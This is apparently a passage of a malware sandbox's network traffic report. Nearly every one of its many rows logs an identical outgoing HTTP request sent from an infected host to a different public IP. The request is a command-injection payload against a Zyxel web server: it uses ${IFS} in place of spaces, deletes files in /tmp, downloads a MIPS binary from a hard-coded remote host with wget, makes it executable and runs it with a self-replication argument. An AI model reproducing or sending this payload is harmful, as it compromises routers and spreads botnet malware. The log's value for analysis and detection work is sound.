                                                  Jan 19, 2024 18:23:52.992027044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3770192.168.2.1352656168.127.138.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992089033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3771192.168.2.134991653.38.39.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992151976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3772192.168.2.135901060.4.163.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992218018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3773192.168.2.133411881.225.145.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992264032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3774192.168.2.133392044.70.111.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992297888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3775192.168.2.1338440217.41.108.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992379904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3776192.168.2.1333608220.193.115.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992434025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3777192.168.2.134781834.18.22.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992495060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3778192.168.2.1355732168.118.153.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992546082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3779192.168.2.1336934187.50.140.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992588043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3780192.168.2.1356794162.27.25.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992635012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3781192.168.2.1339690161.221.54.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992666960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3782192.168.2.133962870.97.54.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992733002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3783192.168.2.133465257.41.64.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992779970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3784192.168.2.1341416164.132.147.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992841005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3785192.168.2.135298262.31.196.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992885113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3786192.168.2.136016257.213.182.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992944002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3787192.168.2.134819451.69.213.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.992988110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3788192.168.2.133310840.100.207.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993052959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3789192.168.2.1348554137.97.253.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993093967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3790192.168.2.1353492205.176.194.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993177891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3791192.168.2.1359372154.106.234.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993227005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3792192.168.2.1352460173.92.151.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993288994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3793192.168.2.1345028141.29.223.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993347883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3794192.168.2.1345810119.182.162.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993395090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3795192.168.2.1344700217.127.174.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993463039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3796192.168.2.1337390192.153.184.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993536949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3797192.168.2.135310485.80.78.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993592978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3798192.168.2.135651834.198.224.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993659019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3799192.168.2.134079019.23.57.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993720055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3800192.168.2.1343482131.154.202.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993757010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3801192.168.2.1341090193.47.97.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993829966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3802192.168.2.1357398209.128.104.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993892908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3803192.168.2.1334444164.200.78.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993932962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3804192.168.2.133576025.180.142.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.993997097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3805192.168.2.1357572115.240.116.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994055033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3806192.168.2.13487068.193.204.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994139910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3807192.168.2.133702213.4.86.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994195938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3808192.168.2.135197264.62.6.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994251966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3809192.168.2.135596473.159.77.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994297981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3810192.168.2.135952035.7.248.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994358063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3811192.168.2.1360118115.131.5.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994424105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3812192.168.2.135268236.234.148.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994503975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3813192.168.2.1346466139.114.93.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994566917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3814192.168.2.1341634223.76.94.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994621038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3815192.168.2.1353390195.54.247.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994673014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3816192.168.2.134360213.137.247.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994709969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3817192.168.2.1335622108.189.255.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994756937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3818192.168.2.1340418193.47.96.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994875908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3819192.168.2.134749085.89.173.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.994926929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3820192.168.2.1351194209.207.98.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995002031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3821192.168.2.1354128212.126.97.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995048046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3822192.168.2.1352310199.3.119.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995106936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3823192.168.2.1344242191.113.132.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995166063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3824192.168.2.133761465.165.32.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995197058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3825192.168.2.135316479.65.224.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995263100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3826192.168.2.135411213.153.197.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995327950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3827192.168.2.1345978196.145.21.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995390892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3828192.168.2.1336694154.122.254.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995448112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3829192.168.2.1347664193.226.68.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995492935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3830192.168.2.1353066108.24.22.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995577097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3831192.168.2.1334980180.136.120.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:52.995629072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3832192.168.2.1334490113.233.217.35443
                                                  TimestampBytes transferredDirectionData
